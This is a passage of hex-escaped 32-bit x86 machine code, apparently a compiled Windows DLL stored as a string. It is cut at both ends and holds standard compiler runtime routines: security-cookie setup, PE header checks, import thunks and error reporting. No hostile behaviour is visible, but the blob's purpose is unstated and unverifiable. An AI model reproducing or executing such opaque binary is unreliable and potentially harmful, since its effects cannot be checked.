xC4\x04\x89\x45\xE4\x83\x7D\xE4\xFF\x75\x12\x8B\x4D\x08\x51\xFF\x15\x18\x82\x01\x10\x83\xC4\x04\xE9\x97\x00\x00\x00\x6A\x08\xE8\x66\xF4\xFF\xFF\x83\xC4\x04\xC7\x45\xFC\x00\x00\x00\x00\x8B\x15\x64\x75\x01\x10\x52\xFF\x15\x44\x82\x01\x10\x83\xC4\x04\x89\x45\xE4\xA1\x54\x75\x01\x10\x50\xFF\x15\x44\x82\x01\x10\x83\xC4\x04\x89\x45\xDC\x8D\x4D\xDC\x51\x8D\x55\xE4\x52\x8B\x45\x08\x50\xFF\x15\x54\x82\x01\x10\x83\xC4\x04\x50\xE8\x16\xF5\xFF\xFF\x83\xC4\x0C\x89\x45\xE0\x8B\x4D\xE4\x51\xFF\x15\x54\x82\x01\x10\x83\xC4\x04\xA3\x64\x75\x01\x10\x8B\x55\xDC\x52\xFF\x15\x54\x82\x01\x10\x83\xC4\x04\xA3\x54\x75\x01\x10\xC7\x45\xFC\xFE\xFF\xFF\xFF\xE8\x02\x00\x00\x00\xEB\x0B\x6A\x08\xE8\x69\xF4\xFF\xFF\x83\xC4\x04\xC3\x8B\x45\xE0\x8B\x4D\xF0\x64\x89\x0D\x00\x00\x00\x00\x59\x5F\x5E\x5B\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x8B\x45\x08\x50\xE8\xD9\xF3\xFF\xFF\x83\xC4\x04\xF7\xD8\x1B\xC0\xF7\xD8\x83\xE8\x01\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x56\xBE\xE8\x60\x01\x10\x8B\xC6\x3D\xEC\x62\x01\x10\x73\x13\x8B\x06\x85\xC0\x74\x02\xFF\xD0\x83\xC6\x04\x81\xFE\xEC\x62\x01\x10\x72\xED\x5E\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x56\xBE\xF4\x63\x01\x10\x8B\xC6\x3D\xF8\x65\x01\x10\x73\x13\x8B\x06\x85\xC0\x74\x02\xFF\xD0\x83\xC6\x04\x81\xFE\xF8\x65\x01\x10\x72\xED\x5E\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xFF\x25\x54\x82\x01\x10\xFF\x25\x50\x82\x01\x10\xFF\x25\x4C\x82\x01\x10\xFF\x25\x48\x82\x01\x10\xFF\x25\x44\x82\x01\x10\xFF\x25\x40\x82\x01\x10\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x83\xEC\x0C\x8B\x45\x08\x89\x45\xF8\x8B\x4D\xF8\x0F\xB7\x11\x81\xFA\x4D\x5A\x00\x00\x74\x04\x33\xC0\xEB\x3B\x8B\x45\xF8\x8B\x4D\xF8\x03\x48\x3C\x89\x4D\xF4\x8B\x55\xF4\x81\x3A\x50\x45\x00\x00\x74\x04\x33\xC0\xEB\x20\x8B\x45\xF4\x83\xC0\x18\x89\x45\xFC\x8B\x4D\xFC\x0F\xB7\x11\x81\xFA\x0B\x01\x00\x00\x74\x04\x33\xC0\xEB\x05\xB8\x01\x00\x00\x00\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x83\xEC\x0C\x8B\x45\x08\x8B\x4D\x08\x03\x48\x3C\x89\x4D\xFC\xC7\x45\xF8\x00\x00\x00\x00\x8B\x55\xFC\x0F\xB7\x42\x14\x8B\x4D\xFC\x8D\x54\x01\x18\x89\x55\xF4\xEB\x12\x8B\x45\xF8\x83\xC0\x01\x89\x45\xF8\x8B\x4D\xF4\x83\xC1\x28\x89\x4D\xF4\x8B\x55\xFC\x0F\xB7\x42\x06\x39\x45\xF8\x73\x23\x8B\x4D\xF4\x8B\x55\x0C\x3B\x51\x0C\x72\x16\x8B\x45\xF4\x8B\x48\x0C\x8B\x55\xF4\x03\x4A\x08\x39\x4D\x0C\x73\x05\x8B\x45\xF4\xEB\x04\xEB\xBF\x33\xC0\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x6A\xFE\x68\x50\x67\x01\x10\x68\x64\x10\x01\x10\x64\xA1\x00\x00\x00\x00\x50\x83\xC4\xD8\x53\x56\x57\xA1\x0C\x70\x01\x10\x31\x45\xF8\x33\xC5\x50\x8D\x45\xF0\x64\xA3\x00\x00\x00\x00\x89\x65\xE8\xC7\x45\xE4\x00\x00\x00\x10\xC7\x45\xFC\x00\x00\x00\x00\x8B\x45\xE4\x50\xE8\x9D\xF1\xFF\xFF\x83\xC4\x04\x85\xC0\x75\x16\xC7\x45\xD4\x00\x00\x00\x00\xC7\x45\xFC\xFE\xFF\xFF\xFF\x8B\x45\xD4\xE9\x97\x00\x00\x00\x8B\x4D\x08\x2B\x4D\xE4\x89\x4D\xDC\x8B\x55\xDC\x52\x8B\x45\xE4\x50\xE8\x47\xF1\xFF\xFF\x83\xC4\x08\x89\x45\xE0\x83\x7D\xE0\x00\x75\x13\xC7\x45\xD0\x00\x00\x00\x00\xC7\x45\xFC\xFE\xFF\xFF\xFF\x8B\x45\xD0\xEB\x62\x8B\x4D\xE0\x8B\x51\x24\x81\xE2\x00\x00\x00\x80\xF7\xDA\x1B\xD2\x83\xC2\x01\x89\x55\xCC\xC7\x45\xFC\xFE\xFF\xFF\xFF\x8B\x45\xCC\xEB\x40\xC7\x45\xFC\xFE\xFF\xFF\xFF\xEB\x37\x8B\x45\xEC\x8B\x08\x8B\x11\x89\x55\xD8\x8B\x45\xD8\x33\xC9\x3D\x05\x00\x00\xC0\x0F\x94\xC1\x8B\xC1\xC3\x8B\x65\xE8\xC7\x45\xC8\x00\x00\x00\x00\xC7\x45\xFC\xFE\xFF\xFF\xFF\x8B\x45\xC8\xEB\x07\xC7\x45\xFC\xFE\xFF\xFF\xFF\x8B\x4D\xF0\x64\x89\x0D\x00\x00\x00\x00\x59\x5F\x5E\x5B\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xFF\x25\x3C\x82\x01\x10\xFF\x25\x38\x82\x01\x10\xFF\x25\x34\x82\x01\x10\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x83\xEC\x18\xC7\x45\xF8\x00\x00\x00\x00\xC7\x45\xFC\x00\x00\x00\x00\x81\x3D\x0C\x70\x01\x10\x4E\xE6\x40\xBB\x74\x1F\xA1\x0C\x70\x01\x10\x25\x00\x00\xFF\xFF\x74\x13\x8B\x0D\x0C\x70\x01\x10\xF7\xD1\x89\x0D\x10\x70\x01\x10\xE9\x96\x00\x00\x00\x8D\x55\xF8\x52\xFF\x15\xB4\x81\x01\x10\x8B\x45\xF8\x89\x45\xF4\x8B\x4D\xF4\x33\x4D\xFC\x89\x4D\xF4\xFF\x15\xCC\x81\x01\x10\x33\x45\xF4\x89\x45\xF4\xFF\x15\xC8\x81\x01\x10\x33\x45\xF4\x89\x45\xF4\xFF\x15\xC4\x81\x01\x10\x33\x45\xF4\x89\x45\xF4\x8D\x55\xE8\x52\xFF\x15\x68\x81\x01\x10\x8B\x45\xF4\x33\x45\xE8\x89\x45\xF4\x8B\x4D\xF4\x33\x4D\xEC\x89\x4D\xF4\x81\x7D\xF4\x4E\xE6\x40\xBB\x75\x09\xC7\x45\xF4\x4F\xE6\x40\xBB\xEB\x17\x8B\x55\xF4\x81\xE2\x00\x00\xFF\xFF\x75\x0C\x8B\x45\xF4\xC1\xE0\x10\x0B\x45\xF4\x89\x45\xF4\x8B\x4D\xF4\x89\x0D\x0C\x70\x01\x10\x8B\x55\xF4\xF7\xD2\x89\x15\x10\x70\x01\x10\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xFF\x25\x2C\x82\x01\x10\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x8B\x45\x14\x50\x8B\x4D\x10\x51\x8B\x55\x0C\x52\x8B\x45\x08\x50\x68\x14\x10\x01\x10\x68\x0C\x70\x01\x10\xE8\xC1\xEF\xFF\xFF\x83\xC4\x18\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xFF\x15\xB0\x81\x01\x10\x85\xC0\x74\x17\x68\x04\x10\x00\x00\xE8\x1C\x00\x00\x00\x83\xC4\x04\x85\xC0\x74\x06\xB8\x01\x00\x00\x00\xC3\x33\xC0\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x6A\xFE\x68\x70\x67\x01\x10\x68\x64\x10\x01\x10\x64\xA1\x00\x00\x00\x00\x50\x83\xEC\x24\x53\x56\x57\xA1\x0C\x70\x01\x10\x31\x45\xF8\x33\xC5\x50\x8D\x45\xF0\x64\xA3\x00\x00\x00\x00\x89\x65\xE8\x33\xC0\x88\x45\xE7\xC7\x45\xCC\x01\x10\x00\x00\x8B\x4D\x08\x89\x4D\xD0\x8D\x55\xE7\x89\x55\xD4\x89\x45\xFC\x8D\x4D\xCC\x51\x6A\x06\x50\x68\x88\x13\x6D\x40\xFF\x15\xAC\x81\x01\x10\xEB\x09\xB8\x01\x00\x00\x00\xC3\x8B\x65\xE8\xC7\x45\xFC\xFE\xFF\xFF\xFF\x0F\xB6\x45\xE7\x8B\x4D\xF0\x64\x89\x0D\x00\x00\x00\x00\x59\x5F\x5E\x5B\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x8B\x45\x0C\x83\xF8\x04\x77\x24\x8B\x0C\x85\x14\x70\x01\x10\x8B\x14\x85\x94\x59\x01\x10\x83\xF9\xFF\x74\x0F\x52\x50\x8B\x45\x08\x51\x50\xE8\x44\x00\x00\x00\x83\xC4\x10\x5D\xC3\xBA\x74\x56\x01\x10\x52\xB8\x05\x00\x00\x00\x50\x8B\x45\x08\xB9\x01\x00\x00\x00\x51\x50\xE8\x24\x00\x00\x00\x83\xC4\x10\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x81\xEC\x3C\x0E\x00\x00\xA1\x0C\x70\x01\x10\x33\xC5\x89\x45\xFC\x53\x8B\x5D\x08\x56\x57\x8B\x7D\x14\x53\x89\xBD\xC4\xF1\xFF\xFF\xC7\x85\xC8\xF1\xFF\xFF\x00\x00\x00\x00\xE8\x09\xED\xFF\xFF\x83\xC4\x04\x89\x85\xD0\xF1\xFF\xFF\x85\xC0\x75\x0F\x53\xE8\x3B\xEE\xFF\xFF\x83\xC4\x04\x89\x85\xC8\xF1\xFF\xFF\x8B\x35\xA0\x81\x01\x10\x6A\x00\x6A\x00\x6A\xFF\x57\x6A\x00\x68\xE9\xFD\x00\x00\xFF\xD6\x3D\x00\x02\x00\x00\x73\x26\x50\x8D\x85\xD4\xF1\xFF\xFF\x50\x6A\xFF\x57\x6A\x00\x68\xE9\xFD\x00\x00\xFF\xD6\x85\xC0\x74\x0E\x8D\x8D\xD4\xF1\xFF\xFF\x89\x8D\xCC\xF1\xFF\xFF\xEB\x0A\xC7\x85\xCC\xF1\xFF\xFF\xF8\x5A\x01\x10\x68\x02\x10\x00\x00\xE8\x39\xFE\xFF\xFF\x8B\x7D\x10\x83\xC4\x04\x85\xC0\x74\x25\x8B\x95\xCC\xF1\xFF\xFF\x8B\x04\xBD\xAC\x59\x01\x10\x52\x53\x50\x57\xE8\xC9\x01\x00\x00\x83\xC4\x10\x85\xC0\x0F\x85\x24\x01\x00\x00\x32\xC0\xEB\x02\xB0\x01\x83\xBD\xC8\xF1\xFF\xFF\x00\x8B\xB5\xD0\xF1\xFF\xFF\x75\x08\x85\xF6\x0F\x84\x01\x01\x00\x00\x84\xC0\x74\x0E\xFF\x15\xB0\x81\x01\x10\x85\xC0\x0F\x85\xEF\x00\x00\x00\x68\x04\x01\x00\x00\x8D\x8D\xEC\xFB\xFF\xFF\x51\x8D\x95\xD0\xF1\xFF\xFF\x52\x68\x04\x01\x00\x00\x8D\x85\xF4\xFD\xFF\xFF\x50\x83\xC3\xFB\x53\xE8\xFA\xEC\xFF\xFF\x83\xC4\x18\x85\xF6\x74\x2D\x8B\x8D\xCC\xF1\xFF\xFF\x8B\x85\xD0\xF1\xFF\xFF\x51\x57\x68\xA8\x5A\x01\x10\x8D\x95\xEC\xFB\xFF\xFF\x52\x8B\x55\x0C\x50\x8D\x8D\xF4\xFD\xFF\xFF\x51\x52\xFF\xD6\xE9\x8B\x00\x00\x00\x8B\x3D\xA4\x81\x01\x10\x6A\x00\x6A\x00\x68\x0A\x03\x00\x00\x8D\x85\xD4\xF5\xFF\xFF\x50\x6A\xFF\x8D\x8D\xF4\xFD\xFF\xFF\x51\x6A\x00\x68\xE9\xFD\x00\x00\xBB\x90\x5A\x01\x10\xFF\xD7\x85\xC0\x74\x06\x8D\x9D\xD4\xF5\xFF\xFF\x6A\x00\x6A\x00\x68\x0A\x03\x00\x00\x8D\x95\xE0\xF8\xFF\xFF\x52\x6A\xFF\x8D\x85\xEC\xFB\xFF\xFF\x50\x6A\x00\x68\xE9\xFD\x00\x00\xBE\x78\x5A\x01\x10\xFF\xD7\x85\xC0\x74\x06\x8D\xB5\xE0\xF8\xFF\xFF\x8B\x8D\xC4\xF1\xFF\xFF\x8B\x55\x10\x8B\x85\xD0\xF1\xFF\xFF\x51\x8B\x4D\x0C\x52\x68\x50\x5A\x01\x10\x56\x50\x53\x51\xFF\x95\xC8\xF1\xFF\xFF\x83\xC4\x1C\x83\xF8\x01\x75\x06\xFF\x15\xA8\x81\x01\x10\x8B\x4D\xFC\x5F\x5E\x33\xCD\x5B\xE8\x21\xEB\xFF\xFF\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x6A\xFE\x68\x90\x67\x01\x10\x68\x64\x10\x01\x10\x64\xA1\x00\x00\x00\x00\x50\x83\xEC\x24\x53\x56\x57\xA1\x0C\x70\x01\x10\x31\x45\xF8\x33\xC5\x50\x8D\x45\xF0\x64\xA3\x00\x00\x00\x00\x89\x65\xE8\x33\xC0\x88\x45\xE7\xC7\x45\xCC\x02\x10\x00\x00\x8B\x4D\x08\x89\x4D\xD0\x8B\x55\x0C\x89\x55\xD4\x8B\x4D\x10\x89\x4D\xD8\x8D\x55\xE7\x89\x55\xDC\x8B\x4D\x14\x89\x4D\xE0\x89\x45\xFC\x8D\x55\xCC\x52\x6A\x06\x50\x68\x88\x13\x6D\x40\xFF\x15\xAC\x81\x01\x10\xEB\x09\xB8\x01\x00\x00\x00\xC3\x8B\x65\xE8\xC7\x45\xFC\xFE\xFF\xFF\xFF\x0F\xB6\x45\xE7\x8B\x4D\xF0\x64\x89\x0D\x00\x00\x00\x00\x59\x5F\x5E\x5B\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x81\xEC\x08\x04\x00\x00\xA1\x0C\x70\x01\x10\x33\xC5\x89\x45\xFC\x83\x3D\x1C\x70\x01\x10\xFF\x8B\x45\x08\x89\x85\xF8\xFB\xFF\xFF\x8B\x45\x0C\x0F\x84\xC0\x00\x00\x00\x80\x38\x00\x53\x56\x0F\x84\x96\x00\x00\x00\x8B\xC8\x8D\x71\x01\x8B\xFF\x8A\x11\x41\x84\xD2\x75\xF9\x2B\xCE\x83\xC1\x2D\x81\xF9\x00\x04\x00\x00\x77\x7B\x8D\x9D\xFC\xFB\xFF\xFF\x33\xC9\x8D\x64\x24\x00\x8A\x91\xC4\x59\x01\x10\x88\x94\x0D\xFC\xFB\xFF\xFF\x41\x84\xD2\x75\xEE\x8B\xD0\x8A\x08\x40\x84\xC9\x75\xF9\x57\x8D\xBD\xFC\xFB\xFF\xFF\x2B\xC2\x4F\x8A\x4F\x01\x47\x84\xC9\x75\xF8\x8B\xC8\xC1\xE9\x02\x8B\xF2\xF3\xA5\x8B\xC8\x83\xE1\x03\xB8\xE0\x59\x01\x10\xF3\xA4\x8B\xC8\x8A\x10\x40\x84\xD2\x75\xF9\x8D\xBD\xFC\xFB\xFF\xFF\x2B\xC1\x8B\xF1\x4F\x8A\x4F\x01\x47\x84\xC9\x75\xF8\x8B\xC8\xC1\xE9\x02\xF3\xA5\x8B\xC8\x83\xE1\x03\xF3\xA4\x5F\xEB\x05\xBB\x7C\x5B\x01\x10\xA1\x1C\x70\x01\x10\x8B\x8D\xF8\xFB\xFF\xFF\x53\x6A\x02\x50\x51\xE8\xB7\xFB\xFF\xFF\x83\xC4\x10\x5E\x5B\x8B\x4D\xFC\x33\xCD\xE8\xCC\xE8\xFF\xFF\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x81\xEC\x44\x01\x00\x00\xA1\x0C\x70\x01\x10\x33\xC5\x89\x45\xFC\x53\x8B\x1D\x24\x70\x01\x10\x56\x8B\x75\x0C\x57\x8B\x7D\x08\x89\xBD\xBC\xFE\xFF\xFF\x83\xFB\xFF\x0F\x84\xEF\x00\x00\x00\x68\xF8\x5C\x01\x10\xFF\x15\x94\x81\x01\x10\x85\xC0\x0F\x84\xCB\x00\x00\x00\x68\xEC\x5C\x01\x10\x50\xFF\x15\x98\x81\x01\x10\xA3\x5C\x71\x01\x10\x85\xF6\x0F\x84\xB2\x00\x00\x00\x85\xC0\x0F\x84\xAA\x00\x00\x00\x8B\x4D\x10\x8B\x56\x0C\x68\xE0\x5C\x01\x10\x51\x68\xAC\x5C\x01\x10\x83\xEA\x24\x52\x68\xA0\x5C\x01\x10\x8D\x7E\x20\x57\x68\x90\x5C\x01\x10\x68\x38\x5C\x01\x10\x8D\x8D\xC0\xFE\xFF\xFF\x68\x1C\x5C\x01\x10\x51\xFF\xD0\x8B\x56\x0C\x83\xEA\x24\x52\x57\x8D\x45\xB4\x50\x8D\x4D\xE8\x51\xE8\xCE\x00\x00\x00\x83\xC4\x38\x68\x18\x5C\x01\x10\x8D\x55\xB4\x52\x68\x14\x5C\x01\x10\x8D\x45\xE8\x50\x68\x08\x5C\x01\x10\x8D\x8D\xC0\xFE\xFF\xFF\x51\xFF\x15\x9C\x81\x01\x10\x8D\x94\x05\xC0\xFE\xFF\xFF\x52\xFF\x15\x5C\x71\x01\x10\x8B\x8D\xBC\xFE\xFF\xFF\x8D\x85\xC0\xFE\xFF\xFF\x50\x6A\x04\x53\x51\xE8\x63\xFA\xFF\xFF\x83\xC4\x28\x5F\x5E\x5B\x8B\x4D\xFC\x33\xCD\xE8\x77\xE7\xFF\xFF\x8B\xE5\x5D\xC3\x68\xB0\x5B\x01\x10\x6A\x04\x53\x57\xE8\x41\xFA\xFF\xFF\x83\xC4\x10\x8B\x4D\xFC\x5F\x5E\x33\xCD\x5B\xE8\x55\xE7\xFF\xFF\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x83\xEC\x08\x8B\x45\x0C\x53\x56\x8B\x75\x08\x89\x45\xFC\x8B\x45\x10\x57\x33\xFF\x2B\xC6\x89\x45\xF8\x8B\xFF\x8B\x4D\x14\x83\xF9\x10\x72\x05\xB9\x10\x00\x00\x00\x3B\xF9\x73\x26\x8A\x1C\x30\x8B\x55\xFC\x0F\xB6\xCB\x51\x68\x08\x5D\x01\x10\x52\xFF\x15\x5C\x71\x01\x10\x83\x45\xFC\x03\x8B\x45\xF8\x83\xC4\x0C\x88\x1E\x47\x46\xEB\xC9\x8B\x4D\x0C\x8B\x45\x08\x8D\x14\x79\xC6\x04\x07\x00\xC6\x04\x17\x00\x5F\x5E\x5B\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x81\xEC\x04\x04\x00\x00\xA1\x0C\x70\x01\x10\x33\xC5\x89\x45\xFC\x83\x3D\x20\x70\x01\x10\xFF\x8B\x45\x08\x0F\x84\xB6\x00\x00\x00\x53\x56\x85\xC0\x0F\x84\x90\x00\x00\x00\x8B\xC8\x8D\x71\x01\x8A\x11\x41\x84\xD2\x75\xF9\x2B\xCE\x83\xC1\x3A\x81\xF9\x00\x04\x00\x00\x77\x77\x8D\x9D\xFC\xFB\xFF\xFF\x33\xC9\x8A\x91\xF4\x59\x01\x10\x88\x94\x0D\xFC\xFB\xFF\xFF\x41\x84\xD2\x75\xEE\x8B\xD0\x8A\x08\x40\x84\xC9\x75\xF9\x57\x8D\xBD\xFC\xFB\xFF\xFF\x2B\xC2\x4F\x8A\x4F\x01\x47\x84\xC9\x75\xF8\x8B\xC8\xC1\xE9\x02\x8B\xF2\xF3\xA5\x8B\xC8\x83\xE1\x03\xB8\x04\x5A\x01\x10\xF3\xA4\x8B\xC8\x8A\x10\x40\x84\xD2\x75\xF9\x8D\xBD\xFC\xFB\xFF\xFF\x2B\xC1\x8B\xF1\x4F\x8A\x4F\x01\x47\x84\xC9\x75\xF8\x8B\xC8\xC1\xE9\x02\xF3\xA5\x8B\xC8\x83\xE1\x03\xF3\xA4\x5F\xEB\x05\xBB\x10\x5D\x01\x10\xA1\x20\x70\x01\x10\x53\x6A\x03\x50\x8B\x45\x04\x50\xE8\x7A\xF8\xFF\xFF\x83\xC4\x10\x5E\x5B\x8B\x4D\xFC\x33\xCD\xE8\x8F\xE5\xFF\xFF\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xFF\x25\x28\x82\x01\x10\xFF\x25\x24\x82\x01\x10\xFF\x25\x20\x82\x01\x10\xFF\x25\x1C\x82\x01\x10\xFF\x25\x14\x82\x01\x10\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x3B\x0D\x0C\x70\x01\x10\x75\x02\xF3\xC3\xE9\x74\xE5\xFF\xFF\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x8B\x45\x14\x8B\x55\x0C\x83\xEC\x44\x56\x8B\x75\x08\xC7\x00\x00\x00\x00\x00\x6A\x1C\x8D\x45\xBC\x50\x33\xC9\x4E\x56\x66\x89\x0A\xFF\x15\x80\x81\x01\x10\x85\xC0\x75\x07\x33\xC0\x5E\x8B\xE5\x5D\xC3\x8B\x4D\x1C\x8B\x55\x18\x8B\x45\xC0\x51\x52\x50\xFF\x15\x84\x81\x01\x10\x85\xC0\x74\xE3\x8B\x55\xC0\xB9\x4D\x5A\x00\x00\x66\x39\x0A\x75\xD6\x8B\x42\x3C\x85\xC0\x7E\xCF\x03\xC2\x81\x38\x50\x45\x00\x00\x75\xC5\x0F\xB7\x48\x06\x53\x57\x0F\xB7\x78\x14\x8D\x44\x07\x18\x2B\xF2\x33\xFF\x33\xDB\x85\xC9\x76\x1A\x83\xC0\x0C\x8B\x10\x3B\xF2\x72\x09\x8B\xFE\x2B\xFA\x3B\x70\xFC\x72\x08\x43\x83\xC0\x28\x3B\xD9\x72\xE9\x3B\xD9\x74\x5B\x43\x80\x3D\x64\x71\x01\x10\x00\x75\x20\x83\x3D\x60\x71\x01\x10\x00\x75\x48\xE8\xB8\x02\x00\x00\xA3\x60\x71\x01\x10\x85\xC0\x74\x3A\xC6\x05\x64\x71\x01\x10\x01\xEB\x05\xA1\x60\x71\x01\x10\x68\x64\x5D\x01\x10\x50\xFF\x15\x98\x81\x01\x10\x33\xF6\x3B\xC6\x74\x1A\x8D\x55\xF0\x52\x8B\x55\x18\x56\x56\x8D\x4D\xD8\x51\x56\x56\x56\x52\xFF\xD0\x83\xC4\x20\x85\xC0\x75\x09\x5F\x5B\x33\xC0\x5E\x8B\xE5\x5D\xC3\x8B\x4D\xF0\x8B\x01\x8B\x10\x89\x75\xE4\xFF\